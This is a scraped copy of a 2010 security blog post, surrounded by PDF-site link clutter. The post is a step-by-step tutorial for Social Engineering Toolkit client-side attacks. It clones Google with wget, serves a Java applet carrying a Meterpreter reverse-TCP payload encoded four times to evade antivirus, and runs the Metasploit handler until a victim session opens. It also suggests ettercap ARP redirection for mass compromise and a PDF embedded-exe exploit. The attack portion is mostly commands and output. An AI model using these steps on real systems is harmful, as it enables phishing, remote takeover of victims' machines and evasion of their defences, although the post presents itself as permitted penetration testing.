Client Side exploits | netsecuritystuff [PDF]

Feb 10, 2010 - This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit p
78 downloads 27 Views 95KB Size
Report
Download PDF
PNG Network

Recommend Stories

Trusting Client-side Code
We can't help everyone, but everyone can help someone. Ronald Reagan
PDF Side by Side
Be grateful for whoever comes, because each has been sent as a guide from beyond. Rumi
Ebook pdf Side by Side
Don't fear change. The surprise is the only way to new discoveries. Be playful! Gordana Biernat
PDF Download Side by Side
Raise your words, not voice. It is rain that grows flowers, not thunder. Rumi
Client-Side Cross-Site Scripting Protection
Sorrow prepares you for joy. It violently sweeps everything out of your house, so that new joy can find
iOS Exploits
Respond to every call that excites your spirit. Rumi
Web Application Exploits
If you want to become full, let yourself be empty. Lao Tzu
Client List pdf
Your task is not to seek for love, but merely to seek and find all the barriers within yourself that
ics exploits development
We can't help everyone, but everyone can help someone. Ronald Reagan
Developing Client-Side Workflows with Geocortex Workflow 5 Course Outline
Why complain about yesterday, when you can make a better tomorrow by making the most of today? Anon

Idea Transcript

netsecuritystuff

Client Side exploits Posted on February 10, 2010

Client side attacks nowadys have become a major focus when performing penetration tests. You are sure once you forward an infected word document or attach malicious exe`s on a pdf, someone in the organisation will open the document. It has become practically impossible to defend against such attacks . A while back Valsmith,Colim ames, and David kerb released a great way to perform such client attacks during the Blackhat and Defcon conferences with the Metaphish paper and code. http://attackresearch.com/pub.html This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit payloads to pdf documents. Since then David Kennedy with the Social Enginnering Framework and produced a marvelous automated tool called SET. SET allows you to perform all the above attacks and even more , one feature i love is the “website cloning feature”, incorporate that with an arp redirect attack with ettercap, and you could pwn all the clients during a pentest. (with permission of course)Imagine cloning a site as common as “Google” or Facebook and then perfoming a java applet attack , total mass pwnage. On backtrack4 final, set is on the path /pentest/exploits/SET/set Usage: Commands are in bold I first downloaded google.com and moved it to /var/www/google/. a simple wget http://www.google.co.ke will do. cp -r http://www.google.co.ke/ /var/www/ cd /var/www/ mv http://www.google.co.ke /var/www/google cd /pentest/exploits/SET/ ./set Select from the menu on what you would like to do: 1. Automatic E-Mail Attacks (UPDATED) 2. Website Java Applet Attack (UPDATED) 3. Update Metasploit 4. Update SET 5. Create a Payload and Listener 6. Help 7. Exit the Toolkit Enter your choice: 2 Website Attack Vectors 1. Let SET create a website for you 2. Clone and setup a fake website (NEW) 3. Import your own website (NEW) 4. Return to main menu. Enter number: 3 Enter your current IP Address: 192.168.20.1 Enter the path to the website to be cloned: /var/www/google/ What payload do you want to generate: Name: Description: 1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker. 2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker. 3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker. 4. Windows Bind Shell Execute payload and create an accepting port on remote system. 5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline 6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline 7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter 8. Import your own executable Specify a path for your own executable Enter choice (example 1-4): 2 Below is a list of encodings to try and bypass AV. Select one of the below, Shikata_Ga_Nai is typically the best. 1. avoid_utf8_tolower 2. shikata_ga_nai 3. alpha_mixed 4. alpha_upper 5. call4_dword_xor 6. countdown 7. fnstenv_mov 8. jmp_call_additive 9. nonalpha 10. nonupper 11. unicode_mixed 12. unicode_upper 13. alpha2 14. No Encoding Enter your choice (enter for default): 2 Usually 1 to 4 does the trick, if you get an error messsage, some encoders don’t like more than one. Specify 0 if you want. How many times do you want to encode the payload: 4 Enter the PORT of the listener: 4444 [-] Encoding the payload 4 times to get around pesky Anti-Virus. [-] [*] x86/shikata_ga_nai succeeded with size 318 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 345 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 372 (iteration=3) [*] x86/shikata_ga_nai succeeded with size 399 (iteration=4) ………………………….. ……………………….. resource (src/program_junk/meta_config)> use exploit/multi/handler resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource (src/program_junk/meta_config)> set LHOST 192.168.20.1 LHOST => 192.168.20.1 resource (src/program_junk/meta_config)> set LPORT 4444 LPORT => 4444 resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai ENCODING => shikata_ga_nai resource (src/program_junk/meta_config)> set ExitOnSession false ExitOnSession => false resource (src/program_junk/meta_config)> exploit -j [*] Exploit running as background job. msf exploit(handler) > [*] Started reverse handler on 192.168.20.1:4444 [*] Starting the payload handler… msf exploit(handler) > The client goes to the fatefull page http://192.168.20.1 and gets the google search page and runs the java applet. You need to have java installed on client side.

msf exploit(handler) > [*] Sending stage (725504 bytes) [*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123) msf exploit(handler) > sessions Active sessions =============== Id Description Tunnel — ———– —— 1 Meterpreter 192.168.20.1:4444 -> 192.168.20.4:1123 Review a video here on the use of SET : http://vimeo.com/groups/33570/videos/8450443 SET will introduce a version 0.4 soon, with this, you can even sign the java applets yourself. Review a video here on the new version of SET : http://vimeo.com/9198233 Metasploit on the other hand loaded to trunk a java_applet module, with an excellent rank. I have tested it against firefox, ie. It works wonders. For the metasploit module, there is a good tutorial to follow through at paul dot com. The link is http://pauldotcom.com/wiki/index.php/Episode185 The tutorial is easy to understand and follow. Try out the clone feature on SET that downloads the url you give it and embeds the java applet on it. As for pdf attacks, the procedure is the same , try out the adobe attacks and especially the ” Adobe PDF Embedded EXE Social Engineering” on SET and on metasploit it’s the exploit windows/fileformat/adobe_pdf_embedded_exe. References: http://www.attackresearch.com http://www.social-engineer.org http://pauldotcom.com http://metasploit.com Credits: David Kennedy, Valsmith, hdm and the metasploit crew, Carlos perez, pauldotcom crew,muts Happy client side hacking

Loading...

Related

Aurora Attack

Web Application Testing

This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to Client Side exploits Dexx says: February 12, 2010 at 2:35 pm

I like! Reply

charles watathi says: February 12, 2010 at 4:38 pm

Welcome Dexx Reply

netsecuritystuff Create a free website or blog at WordPress.com.

What am i not doing right?

Helpful Links

Smile Life

When life gives you a hundred reasons to cry, show life that you have a thousand reasons to smile

Get in touch

© Copyright 2015 - 2024 PDFFOX.COM - All rights reserved.